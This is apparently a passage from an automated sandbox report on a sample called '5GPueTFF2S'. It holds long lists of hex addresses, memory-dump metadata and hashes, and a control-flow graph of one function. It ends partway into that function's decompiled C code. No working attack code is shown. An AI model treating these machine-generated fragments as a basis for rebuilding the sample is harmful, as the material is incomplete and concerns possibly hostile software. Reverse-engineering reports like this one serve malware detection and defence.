                                              0x00ec764f
                                              0x00ec7648
                                              0x00ec7648
                                              0x00ec7648
                                              0x00ec767d
                                              0x00ec7683
                                              0x00ec768a
                                              0x00ec7693
                                              0x00ec7693
                                              0x00ec768c
                                              0x00ec768c
                                              0x00ec768c
                                              0x00ec76a6
                                              0x00ec76a8
                                              0x00ec76a9
                                              0x00ec76a9
                                              0x00ec76af
                                              0x00ec76b5
                                              0x00ec76b6
                                              0x00ec76b9
                                              0x00ec75a7
                                              0x00ec75a7
                                              0x00ec75a7
                                              0x00ec75aa
                                              0x00ec75e3
                                              0x00ec75ac
                                              0x00ec75ac
                                              0x00ec75af
                                              0x00ec75cc
                                              0x00ec75d6
                                              0x00ec75d6
                                              0x00ec75af
                                              0x00ec75aa
                                              0x00ec76da
                                              0x00ec76e7
                                              0x00ec76ee
                                              0x00ec76f6
                                              0x00ec76f7
                                              0x00ec7700
                                              0x00ec7705
                                              0x00ec7707
                                              0x00ec774c
                                              0x00ec774c
                                              0x00ec7753
                                              0x00ec7754
                                              0x00ec775a
                                              0x00ec778c
                                              0x00ec7790
                                              0x00ec7793
                                              0x00ec77a8
                                              0x00ec77ad
                                              0x00ec77af
                                              0x00ec77af
                                              0x00ec77b4
                                              0x00ec77da
                                              0x00ec77e0
                                              0x00ec77f9
                                              0x00ec77fc
                                              0x00ec77fe
                                              0x00ec7800
                                              0x00ec783b
                                              0x00ec7847
                                              0x00ec7848
                                              0x00ec784b
                                              0x00ec7852
                                              0x00ec7852
                                              0x00ec7858
                                              0x00ec7858
                                              0x00ec7800
                                              0x00ec77b6
                                              0x00ec77c3
                                              0x00ec77c8
                                              0x00ec77c8
                                              0x00ec77b4
                                              0x00ec775c
                                              0x00ec775c
                                              0x00ec7762
                                              0x00000000
                                              0x00ec7764
                                              0x00ec7769
                                              0x00ec7778
                                              0x00ec7784
                                              0x00ec7784
                                              0x00ec7762
                                              0x00ec7709
                                              0x00ec770e
                                              0x00ec7710
                                              0x00000000
                                              0x00ec7712
                                              0x00ec7733
                                              0x00ec7735
                                              0x00ec773b
                                              0x00ec7744
                                              0x00ec7744
                                              0x00ec7735
                                              0x00ec7710
                                              0x00ec785b
                                              0x00ec7861
                                              0x00000000
                                              0x00ec5952
                                              0x00ec5952
                                              0x00ec5961
                                              0x00ec5969
                                              0x00ec596b
                                              0x00ec597a
                                              0x00ec5980
                                              0x00ec598e
                                              0x00ec5991
                                              0x00ec599a
                                              0x00ec59a6
                                              0x00ec59b4
                                              0x00ec59ba
                                              0x00ec59bd
                                              0x00ec59d1
                                              0x00ec59db
                                              0x00ec59e1
                                              0x00ec59fb
                                              0x00ec5a07
                                              0x00ec5a0a
                                              0x00ec5a0d
                                              0x00ec5a13
                                              0x00ec5a24
                                              0x00ec5a2b
                                              0x00ec5a39
                                              0x00ec5a46
                                              0x00ec5a47
                                              0x00ec5a4a
                                              0x00ec5a5e
                                              0x00ec5a61
                                              0x00ec5a68
                                              0x00ec5a74
                                              0x00ec5a8c
                                              0x00ec7878
                                              0x00ec787a
                                              0x00ec7880
                                              0x00ec5a92
                                              0x00ec5a92
                                              0x00ec5a99
                                              0x00ec5aa2
                                              0x00ec5aa9
                                              0x00ec5ab0
                                              0x00ec5ab9
                                              0x00ec5abf
                                              0x00000000
                                              0x00ec5ae6
                                              0x00ec5aec
                                              0x00ec5af2
                                              0x00ec5afe
                                              0x00000000
                                              0x00000000
                                              0x00ec5b06
                                              0x00ec5b0a
                                              0x00ec5b10
                                              0x00ec5b12
                                              0x00000000
                                              0x00000000
                                              0x00ec5b18
                                              0x00ec5b22
                                              0x00000000
                                              0x00000000
                                              0x00ec5b2a
                                              0x00ec5b31
                                              0x00ec5b32
                                              0x00ec5b37
                                              0x00ec5b3b
                                              0x00ec5b41
                                              0x00ec5b47
                                              0x00ec5b47
                                              0x00ec5b4e
                                              0x00ec5b51
                                              0x00ec5b55
                                              0x00ec5b5c
                                              0x00ec5b60
                                              0x00ec5b63
                                              0x00ec5b65
                                              0x00ec5b68
                                              0x00ec5b6e
                                              0x00ec5b74
                                              0x00ec5b74
                                              0x00ec5b77
                                              0x00000000
                                              0x00000000
                                              0x00ec5abf
                                              0x00ec5ab9
                                              0x00ec5b7c
                                              0x00ec5b81
                                              0x00ec5b8f
                                              0x00ec5b95
                                              0x00ec5b98
                                              0x00ec5ba6
                                              0x00ec5bc1
                                              0x00ec5bc4
                                              0x00ec5bd7
                                              0x00ec5bdf
                                              0x00ec5be6
                                              0x00ec5be8
                                              0x00ec5be8
                                              0x00ec5bea
                                              0x00ec5bf1
                                              0x00ec5bf1
                                              0x00ec5bec
                                              0x00ec5bec
                                              0x00ec5bec
                                              0x00ec5bf7
                                              0x00ec5c04
                                              0x00ec5c12
                                              0x00ec5c15
                                              0x00ec5c1f
                                              0x00ec5c21
                                              0x00ec5c23
                                              0x00ec5c25
                                              0x00ec5c30
                                              0x00ec5c36
                                              0x00ec5c3c
                                              0x00ec5c4f
                                              0x00ec5c4f
                                              0x00ec5c51
                                              0x00ec5c3e
                                              0x00ec5c3e
                                              0x00ec5c43
                                              0x00ec5c43
                                              0x00ec5c57
                                              0x00ec5c6a
                                              0x00ec5c74
                                              0x00ec5c8d
                                              0x00ec5c94
                                              0x00ec5c94
                                              0x00ec5c94
                                              0x00ec5ba8
                                              0x00ec5bb2
                                              0x00ec5bb2
                                              0x00ec5c9c
                                              0x00ec5cb7
                                              0x00000000
                                              0x00ec5cbd
                                              0x00ec5cc0
                                              0x00ec5cc3
                                              0x00ec5cc3
                                              0x00ec5ccd
                                              0x00ec5cd2
                                              0x00ec5cd5
                                              0x00ec5cd8
                                              0x00ec5ce1
                                              0x00ec5ce7
                                              0x00ec5cee
                                              0x00ec5cee
                                              0x00ec5cee
                                              0x00ec5cee
                                              0x00ec5cf0
                                              0x00ec5cf6
                                              0x00ec5cfd
                                              0x00ec5d04
                                              0x00ec5d04
                                              0x00ec5d04
                                              0x00ec5d04
                                              0x00ec5d08
                                              0x00ec5d85
                                              0x00ec5d87
                                              0x00ec5da1
                                              0x00ec5da1
                                              0x00ec5da8
                                              0x00ec5df4
                                              0x00ec5df7
                                              0x00ec5e01
                                              0x00ec5e16
                                              0x00ec5e1b
                                              0x00ec5e1e
                                              0x00ec5e2a
                                              0x00ec5e31
                                              0x00ec5e3d
                                              0x00ec5e3d
                                              0x00ec5e3f
                                              0x00ec5e49
                                              0x00ec5e4f
                                              0x00ec5e4f
                                              0x00ec5daa
                                              0x00ec5db3
                                              0x00ec5dca
                                              0x00ec5dd0
                                              0x00ec5dd6
                                              0x00ec5de5
                                              0x00ec5de8
                                              0x00ec5de8
                                              0x00ec5d89
                                              0x00ec5d8c
                                              0x00ec5d8e
                                              0x00000000
                                              0x00ec5d90
                                              0x00ec5d90
                                              0x00ec5d96
                                              0x00ec5d96
                                              0x00ec5d8e
                                              0x00ec5d0a
                                              0x00ec5d12
                                              0x00ec5d19
                                              0x00ec5d46
                                              0x00ec5d49
                                              0x00ec5d4f
                                              0x00ec5d55
                                              0x00ec5d61
                                              0x00ec5d63
                                              0x00ec5d6d
                                              0x00ec5d71
                                              0x00ec5d77
                                              0x00ec5d77
                                              0x00ec5d1b
                                              0x00ec5d2d
                                              0x00ec5d33
                                              0x00ec5d33
                                              0x00ec5d19
                                              0x00ec5e5c
                                              0x00ec6003
                                              0x00ec6009
                                              0x00ec600b
                                              0x00ec6012
                                              0x00ec6012
                                              0x00ec60b4
                                              0x00ec60ba
                                              0x00ec60c5
                                              0x00ec60cc
                                              0x00ec60d2
                                              0x00ec612c
                                              0x00ec6132
                                              0x00ec6134
                                              0x00ec613d
                                              0x00ec613d
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6146
                                              0x00ec614f
                                              0x00ec6155
                                              0x00ec6157
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6159
                                              0x00ec6159
                                              0x00ec615b
                                              0x00000000
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615b
                                              0x00ec6169
                                              0x00ec6170
                                              0x00ec6176
                                              0x00ec6179
                                              0x00ec617e
                                              0x00ec618b
                                              0x00ec618d
                                              0x00ec6193
                                              0x00ec61f0
                                              0x00ec61f9
                                              0x00ec61f9
                                              0x00ec61fb
                                              0x00ec6206
                                              0x00ec6217
                                              0x00ec6218
                                              0x00ec621e
                                              0x00ec6224
                                              0x00ec6224
                                              0x00ec6227
                                              0x00ec622c
                                              0x00ec622c
                                              0x00ec6195
                                              0x00ec61a4
                                              0x00ec61b2
                                              0x00ec61b3
                                              0x00ec61b9
                                              0x00ec61bf
                                              0x00ec61cc
                                              0x00ec61db
                                              0x00ec61db
                                              0x00ec60d4
                                              0x00ec60e1
                                              0x00ec60e3
                                              0x00000000
                                              0x00ec60e5
                                              0x00ec60f2
                                              0x00ec60f5
                                              0x00ec610e
                                              0x00ec6122
                                              0x00ec6124
                                              0x00ec6124
                                              0x00ec60e3
                                              0x00ec6237
                                              0x00ec6240
                                              0x00ec6243
                                              0x00ec6244
                                              0x00ec624a
                                              0x00ec6254
                                              0x00ec6254
                                              0x00ec624c
                                              0x00ec624c
                                              0x00ec6252
                                              0x00ec625b
                                              0x00ec625b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6252
                                              0x00ec625d
                                              0x00ec6268
                                              0x00ec626a
                                              0x00ec6294
                                              0x00ec629c
                                              0x00ec629e
                                              0x00ec62a3
                                              0x00ec62a5
                                              0x00ec62b5
                                              0x00ec62b9
                                              0x00ec62cd
                                              0x00ec62cd
                                              0x00ec62d1
                                              0x00ec62dc
                                              0x00ec62df
                                              0x00ec62df
                                              0x00ec626c
                                              0x00ec627a
                                              0x00ec627a
                                              0x00ec62f0
                                              0x00ec62f6
                                              0x00ec6313
                                              0x00ec6323
                                              0x00ec632d
                                              0x00ec6332
                                              0x00ec633b
                                              0x00ec634a
                                              0x00ec6350
                                              0x00ec6352
                                              0x00ec6415
                                              0x00ec641b
                                              0x00ec6463
                                              0x00ec6465
                                              0x00ec6471
                                              0x00ec6483
                                              0x00ec648e
                                              0x00ec6496
                                              0x00ec64a2
                                              0x00ec64a7
                                              0x00ec64b8
                                              0x00ec64be
                                              0x00ec64bf
                                              0x00ec64c2
                                              0x00ec64e8
                                              0x00ec64e8
                                              0x00ec64ea
                                              0x00ec64ea
                                              0x00ec641d
                                              0x00ec6435
                                              0x00ec643b
                                              0x00ec644b
                                              0x00ec644b
                                              0x00ec6358
                                              0x00ec635b
                                              0x00ec635d
                                              0x00ec6363
                                              0x00ec6368
                                              0x00ec637a
                                              0x00ec637c
                                              0x00ec63eb
                                              0x00ec63f5
                                              0x00ec63fb
                                              0x00ec6404
                                              0x00ec6407
                                              0x00ec637e
                                              0x00ec639d
                                              0x00ec63af
                                              0x00ec63b8
                                              0x00ec63c3
                                              0x00ec63c6
                                              0x00ec63c9
                                              0x00ec63c9
                                              0x00ec637c
                                              0x00ec635d
                                              0x00ec64f8
                                              0x00ec650d
                                              0x00ec6513
                                              0x00ec6521
                                              0x00ec652a
                                              0x00ec652c
                                              0x00ec6530
                                              0x00ec6535
                                              0x00ec6537
                                              0x00ec653a
                                              0x00ec653c
                                              0x00ec6548
                                              0x00ec6549
                                              0x00ec6556
                                              0x00ec6568
                                              0x00ec656c
                                              0x00ec657f
                                              0x00ec6592
                                              0x00ec6592
                                              0x00ec6594
                                              0x00ec6594
                                              0x00ec65a3
                                              0x00ec65af
                                              0x00ec65b5
                                              0x00ec66c2
                                              0x00ec66cb
                                              0x00ec66ce
                                              0x00ec66dd
                                              0x00ec66e0
                                              0x00ec66eb
                                              0x00ec6700
                                              0x00ec6706
                                              0x00ec670c
                                              0x00ec670c
                                              0x00ec65bb
                                              0x00ec65c3
                                              0x00ec65c6
                                              0x00ec65c9
                                              0x00ec65cb
                                              0x00ec65d1
                                              0x00ec65d6
                                              0x00ec65dc
                                              0x00ec65fd
                                              0x00ec6600
                                              0x00ec6603
                                              0x00ec6604
                                              0x00ec660a
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec660c
                                              0x00ec660c
                                              0x00ec6616
                                              0x00ec6616
                                              0x00ec660e
                                              0x00ec660e
                                              0x00ec6614
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6614
                                              0x00ec660c
                                              0x00ec662b
                                              0x00ec6634
                                              0x00ec6636
                                              0x00ec6643
                                              0x00ec664d
                                              0x00ec6651
                                              0x00ec665c
                                              0x00ec6675
                                              0x00ec667a
                                              0x00ec6686
                                              0x00ec66a0
                                              0x00ec66b3
                                              0x00ec66b3
                                              0x00ec65de
                                              0x00ec65de
                                              0x00ec65ee
                                              0x00ec65f5
                                              0x00ec65e0
                                              0x00ec65e0
                                              0x00ec65e6
                                              0x00ec65ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec65ec
                                              0x00ec65de
                                              0x00ec65dc
                                              0x00ec65cb
                                              0x00ec6711
                                              0x00ec6717
                                              0x00ec6721
                                              0x00ec6727
                                              0x00ec6728
                                              0x00ec6729
                                              0x00ec672b
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec672d
                                              0x00ec672d
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec672f
                                              0x00ec672f
                                              0x00ec6731
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6731
                                              0x00ec672d
                                              0x00ec6742
                                              0x00ec6746
                                              0x00ec6749
                                              0x00ec674b
                                              0x00ec6793
                                              0x00ec6796
                                              0x00ec674d
                                              0x00ec675a
                                              0x00ec6764
                                              0x00ec6767
                                              0x00ec676a
                                              0x00ec676e
                                              0x00ec6775
                                              0x00ec6775
                                              0x00ec677a
                                              0x00ec677b
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cb
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec681c
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68b6
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec699e
                                              0x00ec69a0
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec69f5
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a32
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6acb
                                              0x00ec6acb
                                              0x00ec6ace
                                              0x00ec6ad4
                                              0x00ec6ad6
                                              0x00ec6ae0
                                              0x00ec6ae6
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6afd
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6ad6
                                              0x00ec6ac7
                                              0x00ec6ac7
                                              0x00ec6ac9
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6ac9
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf3
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c72
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6eba
                                              0x00ec6eba
                                              0x00ec6ebd
                                              0x00ec6ec3
                                              0x00ec6ec5
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6ec5
                                              0x00ec6eb6
                                              0x00ec6eb6
                                              0x00ec6eb8
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6eb8
                                              0x00ec6eb4
                                              0x00ec6fa1
                                              0x00ec6fa1
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701c
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec702e
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7867
                                              0x00ec7872
                                              0x00ec7872
                                              0x00000000
                                              0x00ec5e62
                                              0x00ec5e67
                                              0x00ec5f2f
                                              0x00ec5f34
                                              0x00ec5f34
                                              0x00ec5f3c
                                              0x00ec5f3f
                                              0x00ec5f40
                                              0x00ec5f45
                                              0x00ec5f4b
                                              0x00ec5f4d
                                              0x00ec5f58
                                              0x00ec5f58
                                              0x00ec5f5f
                                              0x00ec5f65
                                              0x00ec5f6b
                                              0x00ec5f6e
                                              0x00ec5f70
                                              0x00ec5f72
                                              0x00ec5f74
                                              0x00ec5f7a
                                              0x00ec5f85
                                              0x00ec5f8e
                                              0x00ec5f9b
                                              0x00ec5fa1
                                              0x00ec5faa
                                              0x00ec5faf
                                              0x00ec5fb8
                                              0x00ec5fbe
                                              0x00ec5fc1
                                              0x00ec5fcb
                                              0x00ec5fcf
                                              0x00ec5f76
                                              0x00ec5f76
                                              0x00ec5f78
                                              0x00000000
                                              0x00000000
                                              0x00ec5f78
                                              0x00ec5f74
                                              0x00ec5f4f
                                              0x00ec5f4f
                                              0x00ec5f52
                                              0x00000000
                                              0x00000000
                                              0x00ec5f52
                                              0x00ec5fd2
                                              0x00ec5fd9
                                              0x00ec5fdf
                                              0x00ec5fdf
                                              0x00ec5fdf
                                              0x00000000
                                              0x00ec5e78
                                              0x00ec5e82
                                              0x00ec5e91
                                              0x00ec5ec1
                                              0x00ec5ec7
                                              0x00ec5fe8
                                              0x00ec5fe8
                                              0x00ec5fed
                                              0x00ec5ff2
                                              0x00ec5ffa
                                              0x00ec5ecd
                                              0x00ec5edc
                                              0x00ec5ee6
                                              0x00ec5eec
                                              0x00ec5efe
                                              0x00ec5f14
                                              0x00ec5f19
                                              0x00ec5f1c
                                              0x00ec5f21
                                              0x00ec5f26
                                              0x00ec5f2e
                                              0x00ec5f2e
                                              0x00ec5e93
                                              0x00ec5e9c
                                              0x00ec5ea5
                                              0x00ec5ea8
                                              0x00ec5eae
                                              0x00ec5eb3
                                              0x00ec5ec0
                                              0x00ec5ec0
                                              0x00ec5e91
                                              0x00ec5e67
                                              0x00ec5e5c
                                              0x00ec5cb7
                                              0x00ec5a8c

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %GR$GetLastError$L$SSh$v
                                              • API String ID: 0-213904386
                                              • Opcode ID: c96509996c9985fe1c0c6d9dab91125d393b2fa09530c6932c120f6be68e6ce8
                                              • Instruction ID: 5db0f79080c3bf27772af4094c7989918d5fe3f9d6f31dcb4ed7be79bbcd7c02
                                              • Opcode Fuzzy Hash: c96509996c9985fe1c0c6d9dab91125d393b2fa09530c6932c120f6be68e6ce8
                                              • Instruction Fuzzy Hash: 7AA2B2709043988FCB29DF68D590BEDBBB2AF59344F14906EE4C5A738DDB3A5A41CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC81D0 Relevance: 25.3, APIs: 9, Strings: 5, Instructions: 798stringCOMMONCrypto
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 810 ec81d0-ec835e call ec1700 813 ec8364-ec8388 call ec1370 810->813 814 ec84b2-ec84c7 810->814 821 ec838f 813->821 822 ec838a-ec838d 813->822 816 ec850c-ec8530 lstrlenA 814->816 817 ec84c9-ec8508 814->817 819 ec8536-ec853c 816->819 820 ec85b7-ec85bd 816->820 817->816 823 ec853e-ec8540 819->823 824 ec8542-ec8566 819->824 825 ec85bf-ec85c4 820->825 826 ec85c7-ec866b 820->826 827 ec8391-ec83b9 call ecee50 821->827 822->827 823->820 823->824 828 ec856d 824->828 829 ec8568-ec856b 824->829 825->826 830 ec866d 826->830 831 ec867e 826->831 842 ec83bf 827->842 843 ec8453-ec84b0 827->843 833 ec856f-ec85b5 828->833 829->833 834 ec866f-ec8675 830->834 835 ec8677-ec867c 830->835 836 ec8680-ec868f 831->836 833->826 834->831 834->835 835->836 838 ec875f-ec876a 836->838 839 ec8695-ec86a3 836->839 844 ec876c-ec87b0 838->844 845 ec87b7-ec87e8 838->845 840 ec8715-ec875d call ecee50 839->840 841 ec86a5 839->841 840->845 846 ec86af-ec8710 841->846 847 ec86a7-ec86ad 841->847 849 ec83c9-ec842c call ecee50 842->849 850 ec83c1-ec83c3 842->850 843->816 844->845 851 ec87ee-ec8804 845->851 852 ec8904-ec892d 845->852 846->845 847->840 847->846 849->816 865 ec8432-ec844e 849->865 850->843 850->849 857 ec880c-ec8814 851->857 858 ec8806 851->858 853 ec892f-ec8934 852->853 854 ec8936 852->854 859 ec8938-ec8950 853->859 854->859 861 ec881d 857->861 862 ec8816-ec881b 857->862 858->857 863 ec8959 859->863 864 ec8952-ec8957 859->864 866 ec881f-ec88ff call ecee50 * 2 861->866 862->866 867 ec895b-ec8980 863->867 864->867 865->816 870 ec8987-ec89a4 866->870 867->870 872 ec8e2e-ec8e34 870->872 873 ec89aa-ec8a0f GetSystemDefaultLangID SetLastError GetLastError 870->873 875 ec8a59-ec8ac1 call ecaa20 GetCurrentDirectoryW 873->875 876 ec8a11 873->876 881 ec8e08-ec8e0d call ec78c0 call ec7bb0 875->881 882 ec8ac7-ec8b47 875->882 878 ec8a17-ec8a4b 876->878 878->875 880 ec8a4d-ec8a57 InterlockedIncrement GetLastError 878->880 880->875 880->878 894 ec8e12-ec8e2c 881->894 883 ec8b49 882->883 884 ec8b62-ec8b85 882->884 886 ec8b4b-ec8b52 883->886 887 ec8b54-ec8b60 883->887 888 ec8b8b-ec8ba5 884->888 886->884 886->887 887->888 890 ec8bab-ec8c01 888->890 891 ec8ba7-ec8ba9 888->891 893 ec8c07-ec8c41 890->893 891->890 891->893 893->881 895 ec8c47-ec8c4d 893->895 894->872 896 ec8d3d-ec8d4e 895->896 897 ec8c53-ec8c58 895->897 898 ec8d50-ec8d7f 896->898 899 ec8d82-ec8da8 896->899 900 ec8c5e-ec8c6e 897->900 901 ec8ce5-ec8cf4 897->901 898->899 903 ec8dde-ec8df5 899->903 904 ec8daa-ec8dd9 899->904 905 ec8c9a-ec8ce0 call ecee50 900->905 906 ec8c70-ec8c77 900->906 901->899 902 ec8cfa-ec8d3b 901->902 902->899 903->881 908 ec8df7-ec8e02 GetACP 903->908 904->903 905->899 906->905 909 ec8c79-ec8c95 906->909 908->881 909->899
                                              C-Code - Quality: 89%
                                              			E00EC81D0(void* __eflags) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				signed int _v9;
				signed int _v10;
				signed int _v11;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v25;
				char _v26;
				signed int _v27;
				signed int _v32;
				signed int _v36;
				signed int _v37;
				char _v38;
				signed int _v44;
